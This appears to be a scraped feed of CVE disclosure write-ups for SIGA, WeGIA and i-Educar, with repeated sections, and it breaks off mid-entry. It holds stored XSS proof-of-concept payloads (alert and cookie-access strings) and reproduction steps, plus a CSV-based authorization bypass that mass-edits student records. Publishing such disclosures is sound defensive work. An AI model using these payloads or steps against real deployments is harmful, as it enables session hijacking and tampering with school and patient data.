https://www.cvehunters.com/categories/siga/ Recent content on CVE-Hunters https://www.cvehunters.com/p/cve-2026-6990/ https://www.cvehunters.com/p/cve-2026-6990/ <h2 id="cve-2026-6990-cross-site-scripting-xss-stored-in-new-sigawfappresponsavelnovo-parameter-descrição">CVE-2026-6990: Cross-Site Scripting (XSS) Stored in new <code>/sigawf/app/responsavel/novo</code> parameter <code>Descrição</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-6990" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-6990</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/sigawf/app/responsavel/novo</code> endpoint of the SIGA application. This vulnerability allows attackers to inject malicious scripts into the <code>Descrição</code> parameter. The injected scripts are stored on the server and executed automatically whenever the <code>/sigawf/app/responsavel/listar</code> page is accessed by users, representing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/sigawf/app/responsavel/novo</code></p><h2 id="cve-2026-6990-cross-site-scripting-xss-stored-in-new-sigawfappresponsavelnovo-parameter-descrição">CVE-2026-6990: Cross-Site Scripting (XSS) Stored in new <code>/sigawf/app/responsavel/novo</code> parameter <code>Descrição</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-6990" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-6990</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>/sigawf/app/responsavel/novo</code> endpoint of the SIGA application. This vulnerability allows attackers to inject malicious scripts into the <code>Descrição</code> parameter. The injected scripts are stored on the server and executed automatically whenever the <code>/sigawf/app/responsavel/listar</code> page is accessed by users, representing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/sigawf/app/responsavel/novo</code></p> <p>Parameter: <code>Descrição</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(document.cookie)//</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> Register the payload in the <code>Descrição</code> field at the <code>/sigawf/app/responsavel/novo</code> endpoint.</p> <p><img src="/p/cve-2026-6990/image.png" width="924" height="266" srcset="/p/cve-2026-6990/image_hu_257390f57da3ef36.png 480w, /p/cve-2026-6990/image_hu_e31e27a952009eca.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="347" data-flex-basis="833px" /></p> <p style="text-align: justify;"> After that, the XSS can be triggered by opening the <code>/sigawf/app/responsavel/listar</code> endpoint.</p> <p><img src="/p/cve-2026-6990/image-1.png" width="478" height="164" srcset="/p/cve-2026-6990/image-1_hu_4ede61fcf518e8ab.png 480w, /p/cve-2026-6990/image-1_hu_6277af4afca73498.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="291" data-flex-basis="699px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel" target="_blank" rel="noopener" >https://github.com/ViniCastro2001/Security_Reports/tree/main/siga/Stored-XSS-Responsavel</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 25 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-40282/ https://www.cvehunters.com/p/cve-2026-40282/ <h2 id="cve-2026-40282-cross-site-scripting-xss-stored-in-intercorrencia_visualizarphp">CVE-2026-40282: Cross-Site Scripting (XSS) Stored in <code>intercorrencia_visualizar.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40282" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40282</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application does not properly sanitize or encode the user name field, which is displayed in system notifications and accepts user-controlled input. An attacker can inject malicious HTML or JavaScript into this field when creating or modifying a user.</br></br>When an “intercorrência” is registered, a notification is generated. Upon clicking this notification, the application renders the user name in the interface without proper escaping, causing any injected code to be executed in the browser.</br></br>This behavior demonstrates improper output encoding, resulting in a Stored XSS vulnerability.</p><h2 id="cve-2026-40282-cross-site-scripting-xss-stored-in-intercorrencia_visualizarphp">CVE-2026-40282: Cross-Site Scripting (XSS) Stored in <code>intercorrencia_visualizar.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40282" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40282</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript into the Intercorrências notification page, which is executed when user access the the page, enabling session hijacking and account takeover.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application does not properly sanitize or encode the user name field, which is displayed in system notifications and accepts user-controlled input. An attacker can inject malicious HTML or JavaScript into this field when creating or modifying a user.</br></br>When an “intercorrência” is registered, a notification is generated. Upon clicking this notification, the application renders the user name in the interface without proper escaping, causing any injected code to be executed in the browser.</br></br>This behavior demonstrates improper output encoding, resulting in a Stored XSS vulnerability.</p> <ul> <li>Vulnerable Endpoint: <code>intercorrencia_visualizar.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">1</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert("XSS")</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"><b>1.</b> Register a patient where the “Name” or "Sobrenome" field contains the payload.</br></br><b>2.</b> Add a "Intercorrência" entry for this user.</br></br><b>3.</b> Navigate to the "Intercorrências" notification page and click in "Recentes" and "Histórico. This vulnerability affects the both pages.</br></br><b>4.</b> Observe that the payload is executed in the browser:</p> <p><img src="/p/cve-2026-40282/image.png" width="603" height="330" srcset="/p/cve-2026-40282/image_hu_dfc5bc911aa9fe3a.png 480w, /p/cve-2026-40282/image_hu_581b1a4709b48d43.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="182" data-flex-basis="438px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-r6h8-7vxv-q8pp</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-40283/ https://www.cvehunters.com/p/cve-2026-40283/ <h2 id="cve-2026-40283-cross-site-scripting-xss-stored-in-profile_pacientephp">CVE-2026-40283: Cross-Site Scripting (XSS) Stored in <code>profile_paciente.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40283" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40283</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Nome” field in the “Informações Pacientes” page. The payload is stored and executed when the patient information is viewed.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application does not properly sanitize or encode the “Nome” field, which accepts user-controlled input. An attacker can insert malicious HTML or JavaScript into this field when creating or editing a patient.</br></br>When the “Informações Pacientes” page is accessed, this value is rendered in the DOM without proper escaping, leading to execution of the injected code in the browser.</br></br>This behavior indicates improper output encoding and results in a Stored XSS vulnerability.</p><h2 id="cve-2026-40283-cross-site-scripting-xss-stored-in-profile_pacientephp">CVE-2026-40283: Cross-Site Scripting (XSS) Stored in <code>profile_paciente.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40283" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40283</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Nome” field in the “Informações Pacientes” page. The payload is stored and executed when the patient information is viewed.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application does not properly sanitize or encode the “Nome” field, which accepts user-controlled input. An attacker can insert malicious HTML or JavaScript into this field when creating or editing a patient.</br></br>When the “Informações Pacientes” page is accessed, this value is rendered in the DOM without proper escaping, leading to execution of the injected code in the browser.</br></br>This behavior indicates improper output encoding and results in a Stored XSS vulnerability.</p> <ul> <li>Vulnerable Endpoint: <code>profile_paciente.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">h1</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p"></</span><span class="nt">script</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"><b>1.</b> Register a patient where the “Name” field contains the payload.</br></br><b>2.</b> Navigate to the “Patient Information” page for the created patient.</br></br><b>3.</b> Observe that the payload is executed in the browser:</p> <p><img src="/p/cve-2026-40283/image.png" width="1360" height="737" srcset="/p/cve-2026-40283/image_hu_7406d057c64135fd.png 480w, /p/cve-2026-40283/image_hu_47e3d68f29444a6d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="184" data-flex-basis="442px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-x74c-gwj9-6cwr</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-40284/ https://www.cvehunters.com/p/cve-2026-40284/ <h2 id="cve-2026-40284-cross-site-scripting-xss-stored-in-listar_despachosphp">CVE-2026-40284: Cross-Site Scripting (XSS) Stored in <code>listar_despachos.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40284" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40284</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Destinatário” field. The payload is stored and later executed when viewing the dispatch page, impacting other users.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize or escape the “Destinatário” field, which is populated with user-controlled data (nome do usuário). When a despacho is created using a maliciously crafted name containing HTML/JavaScript, this value is stored in the system.</br></br>During the rendering of the dispatch listing page, the application inserts this data into the DOM using .html(), causing the browser to interpret and execute the injected code.</br></br>This results in a Stored XSS vulnerability due to improper output encoding of user-controlled data.</p><h2 id="cve-2026-40284-cross-site-scripting-xss-stored-in-listar_despachosphp">CVE-2026-40284: Cross-Site Scripting (XSS) Stored in <code>listar_despachos.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-40284" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-40284</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability allows an authenticated user to inject malicious JavaScript via the “Destinatário” field. The payload is stored and later executed when viewing the dispatch page, impacting other users.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize or escape the “Destinatário” field, which is populated with user-controlled data (nome do usuário). When a despacho is created using a maliciously crafted name containing HTML/JavaScript, this value is stored in the system.</br></br>During the rendering of the dispatch listing page, the application inserts this data into the DOM using .html(), causing the browser to interpret and execute the injected code.</br></br>This results in a Stored XSS vulnerability due to improper output encoding of user-controlled data.</p> <ul> <li>Vulnerable Endpoint: <code>listar_despachos.php</code></li> </ul> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">h1</span><span class="p">></span> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p"></</span><span class="nt">script</span><span class="p">></</span><span class="nt">h1</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"><b>1.</b> Alter the name of a user (or create one) with the payload.</br></br><b>2.</b> Create a despacho selecting this user as “Destinatário”.</br></br><b>3.</b> Access the page that lists or displays the despacho.</br></br><b>4.</b> Observe that the payload is executed in the browser:</p> <p><img src="/p/cve-2026-40284/image.png" width="884" height="751" srcset="/p/cve-2026-40284/image_hu_b5a29259f27a9224.png 480w, /p/cve-2026-40284/image_hu_d02bb8cf295854e3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="117" data-flex-basis="282px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-mccp-8446-phw5</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/thiago50x50.png" loading="lazy" /></a> <a class="link" href="https://br.linkedin.com/in/thiagoescarrone" target="_blank" rel="noopener" >Thiago Escarrone</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 17 Apr 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-4355/ https://www.cvehunters.com/p/cve-2026-4355/ <h2 id="cve-2026-4355-cross-site-scripting-xss-stored-in-new-educar_servidor_curso_lst-parameter-name">CVE-2026-4355: Cross-Site Scripting (XSS) Stored in new <code>educar_servidor_curso_lst</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-4355" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-4355</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_servidor_curso_lst.php</code> endpoint of the I-educar 2.11 application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the <code>ComponenteCurricular/view</code> page is accessed by users, representing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_servidor_curso_lst.php</code></p><h2 id="cve-2026-4355-cross-site-scripting-xss-stored-in-new-educar_servidor_curso_lst-parameter-name">CVE-2026-4355: Cross-Site Scripting (XSS) Stored in new <code>educar_servidor_curso_lst</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-4355" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-4355</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_servidor_curso_lst.php</code> endpoint of the I-educar 2.11 application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the <code>ComponenteCurricular/view</code> page is accessed by users, representing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_servidor_curso_lst.php</code></p> <p>Parameter: <code>name</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"><script>alert(1)</script> </span></span></code></pre></td></tr></table> </div> </div><h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;"> Register the payload in the <code>name</code> field at the <code>educar_servidor_curso_lst.php</code> endpoint.</p> <p><img src="/p/cve-2026-4355/image.png" width="1655" height="336" srcset="/p/cve-2026-4355/image_hu_f0d344b2348566d2.png 480w, /p/cve-2026-4355/image_hu_6c0417b053954c44.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="492" data-flex-basis="1182px" /></p> <p style="text-align: justify;"> After that, the XSS can be triggered by opening the <code>educar_servidor_curso_lst.php</code> endpoint corresponding to the edited ID.</p> <p><img src="/p/cve-2026-4355/image-1.png" width="1655" height="336" srcset="/p/cve-2026-4355/image-1_hu_304eccbb94dee2b4.png 480w, /p/cve-2026-4355/image-1_hu_6a7e07ce80a625ac.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="492" data-flex-basis="1182px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Session hijacking: Stealing cookies or authentication tokens to impersonate users.</li> <li>Credential theft: Harvesting usernames and passwords using malicious scripts.</li> <li>Malware delivery: Distributing unwanted or harmful code to victims.</li> <li>Privilege escalation: Compromising administrative users through persistent scripts.</li> <li>Data manipulation or defacement: Changing or disrupting site content.</li> <li>Reputation damage: Eroding trust among site users and administrators.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md" target="_blank" rel="noopener" >https://github.com/Saiipe/CVE/blob/main/i-educar%2FCVE-2026-4355.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/itauan" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/itauan50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/itauan" target="_blank" rel="noopener" >Itauan Santos</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 17 Mar 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-2015/ https://www.cvehunters.com/p/cve-2026-2015/ <h2 id="cve-2026-2015-broken-function-level-authorization-bfla-allows-arbitrary-modification-of-student-records-via-final-status-import-tool">CVE-2026-2015: Broken Function Level Authorization (BFLA) allows arbitrary modification of <code>Student Records</code> via <code>Final Status Import</code> tool </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-2015" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-2015</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Function Level Authorization (BFLA) vulnerability was identified in the <code>Final Status Import</code> tool of the i-Educar application. This flaw allows an authenticated user with <code>"School"</code> level permissions to bypass intended functional restrictions and modify academic records belonging to any school unit within the municipal network.</p><h2 id="cve-2026-2015-broken-function-level-authorization-bfla-allows-arbitrary-modification-of-student-records-via-final-status-import-tool">CVE-2026-2015: Broken Function Level Authorization (BFLA) allows arbitrary modification of <code>Student Records</code> via <code>Final Status Import</code> tool </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-2015" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-2015</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Function Level Authorization (BFLA) vulnerability was identified in the <code>Final Status Import</code> tool of the i-Educar application. This flaw allows an authenticated user with <code>"School"</code> level permissions to bypass intended functional restrictions and modify academic records belonging to any school unit within the municipal network.</p> <h2 id="details">Details </h2><p>Vulnerable Component: <code>Configurations > Tools > Final Status Import</code></p> <h2 id="poc">PoC </h2><h3 id="context">Context: </h3><p style="text-align: justify;">The attacker account is strictly limited to a specific school unit (Elementary School) with <code>low-level</code> "School" permissions. All administrative or global editing permissions are disabled.</p> <h4 id="authorized-access">Authorized Access: </h4><p style="text-align: justify;">When an administrative user (with global or proper local permissions) accesses a student's record, the "Final Status" dropdown is visible and fully functional, allowing manual status updates.</p> <p><img src="/p/cve-2026-2015/image-5.png" width="397" height="303" srcset="/p/cve-2026-2015/image-5_hu_c70c79ad0e6a6e84.png 480w, /p/cve-2026-2015/image-5_hu_8f3ed5f7812ceb8e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="131" data-flex-basis="314px" /></p> <h4 id="unauthorized-access-attacker-view">Unauthorized Access (Attacker View): </h4><p style="text-align: justify;">When the attacker attempts to edit a student from a different school unit via the standard UI, the "Final Status" dropdown is hidden. The system correctly identifies that the user lacks the authority for this specific function in the frontend.</p> <p><img src="/p/cve-2026-2015/image-6.png" width="411" height="158" srcset="/p/cve-2026-2015/image-6_hu_5510dcd616bc5d5f.png 480w, /p/cve-2026-2015/image-6_hu_7a6c2b34808b5d5b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" /></p> <h3 id="payload">Payload: </h3><p style="text-align: justify;">The attacker identifies student IDs from other institutions (e.g., IDs 212, 199, 200). A CSV payload is prepared to force a status change to "Falecido" (Deceased).</p> <p><img src="/p/cve-2026-2015/image.png" width="894" height="190" srcset="/p/cve-2026-2015/image_hu_c7c42b10db2b974d.png 480w, /p/cve-2026-2015/image_hu_6d3b4c2322653ac2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="470" data-flex-basis="1129px" /></p> <p><img src="/p/cve-2026-2015/image-1.png" width="1545" height="529" srcset="/p/cve-2026-2015/image-1_hu_6d735bdfad336652.png 480w, /p/cve-2026-2015/image-1_hu_a4d2bd6942b71675.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="292" data-flex-basis="700px" /></p> <h3 id="steps-to-reproduce">Steps to Reproduce: </h3><p style="text-align: justify;">The attacker navigates to the Final Status Import tool. By uploading the CSV, they trigger the vulnerable service. The backend processes the IDs without validating institutional ownership.</p> <p><img src="/p/cve-2026-2015/image-2.png" width="1006" height="679" srcset="/p/cve-2026-2015/image-2_hu_e7355ace98b61b4b.png 480w, /p/cve-2026-2015/image-2_hu_12ff1c22bcc7bc72.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="148" data-flex-basis="355px" /></p> <p style="text-align: justify;">The tool reports success for all records. A check on the target student's profile (from the unauthorized unit) confirms the status has been changed. Multiple students are affected, proving the mass-sabotage capability.</p> <p><img src="/p/cve-2026-2015/image-3.png" width="1545" height="858" srcset="/p/cve-2026-2015/image-3_hu_be60c479f60e4c9d.png 480w, /p/cve-2026-2015/image-3_hu_32d0a507a865efc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="432px" /></p> <p><img src="/p/cve-2026-2015/image-4.png" width="1548" height="863" srcset="/p/cve-2026-2015/image-4_hu_b90d49652e2eba69.png 480w, /p/cve-2026-2015/image-4_hu_d09d377b734095d7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="179" data-flex-basis="430px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include: <ul> <li>Tampering with academic data without authorization.</li> <li>Loss of data integrity in school records.</li> <li>Potential legal and reputational damage for educational institutions.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md" target="_blank" rel="noopener" >https://github.com/ViniCastro2001/Security_Reports/blob/main/i-educar/BFLA-Final-Status-Import/README.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/viniciusCastro50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/vinicius-gross-castro" target="_blank" rel="noopener" >Vinicius Castro</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Fri, 06 Feb 2026 00:00:00 +0000 https://www.cvehunters.com/p/cve-2026-23722/ https://www.cvehunters.com/p/cve-2026-23722/ <h2 id="cve-2026-23722-cross-site-scripting-xss-reflected-allows-arbitrary-code-execution-and-ui-redressing">CVE-2026-23722: Cross-Site Scripting (XSS) Reflected allows arbitrary code execution and UI redressing </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2026-23722" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2026-23722</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected 